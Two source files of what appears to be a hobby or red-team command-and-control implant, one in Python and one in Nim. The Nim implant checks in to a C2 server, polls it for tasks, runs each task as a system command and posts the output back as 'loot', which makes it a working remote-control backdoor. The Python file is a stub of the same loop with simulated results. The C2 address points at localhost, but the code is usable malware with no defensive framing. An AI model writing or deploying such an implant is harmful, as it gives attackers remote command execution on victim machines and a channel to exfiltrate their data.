File: implant.py
import requests
import time
import uuid

IMPLANT_ID = str(uuid.uuid4())
C2 = "https://localhost"

def checkin():
    requests.post(f"{C2}/checkin", json={"uuid": IMPLANT_ID}, verify=False)

def get_tasks():
    r = requests.get(f"{C2}/tasks", params={"uuid": IMPLANT_ID}, verify=False)
    return r.json().get("tasks", [])

def send_loot(result):
    requests.post(f"{C2}/loot", json={"uuid": IMPLANT_ID, "loot": result}, verify=False)

if __name__ == "__main__":
    checkin()
    while True:
        tasks = get_tasks()
        for task in tasks:
            print(f"Executing: {task}")
            result = f"Result of '{task}'"
            send_loot(result)
        time.sleep(30)

File: src/implant.nim
# nim c -d:ssl -d:release --opt:speed implant.nim
import uuid
import std/httpclient
import std/strformat
import std/net
import std/json
import std/osproc
import std/os

var 
  IMPLANT_ID = uuid()
  C2_BASEURL = "http://0.0.0.0:8080" # HTTPS is not working yet. I get SSL errors
  client: HttpClient

proc checkin() =
  let body = %*{
      "uuid": fmt"{IMPLANT_ID}"  
  }
  let response = client.request(fmt"{C2_BASEURL}/checkin", httpMethod = HttpPost, body = $body).body
  echo response


proc tasks(): JsonNode =
  let response = client.request(fmt"{C2_BASEURL}/tasks?uuid={IMPLANT_ID}", httpMethod = HttpGet).body
  return parseJson(response)

proc loot(result: string) =
  let body = %*{
      "uuid": fmt"{IMPLANT_ID}",
      "loot": $result
  }
  let response = client.request(fmt"{C2_BASEURL}/loot", httpMethod = HttpPost, body = $body).body
  echo response  

proc executeCommand(cmd: string): string =
  var result = ""
  for line in lines(execProcess(cmd, options = {poUsePath, poStdErrToStdOut})):
    result.add(line & "\n")
  return result

when isMainModule:
  client = newHttpClient()
  client.headers = newHttpHeaders({"Content-Type": "application/json"})
  checkin()

  while true:
    let tasks = tasks()
    if tasks.len == 0:
      continue
    else:
      for task in tasks.getElems():
        let command = task.getStr()
        let result = executeCommand(command)
        loot(result)
        sleep(10000)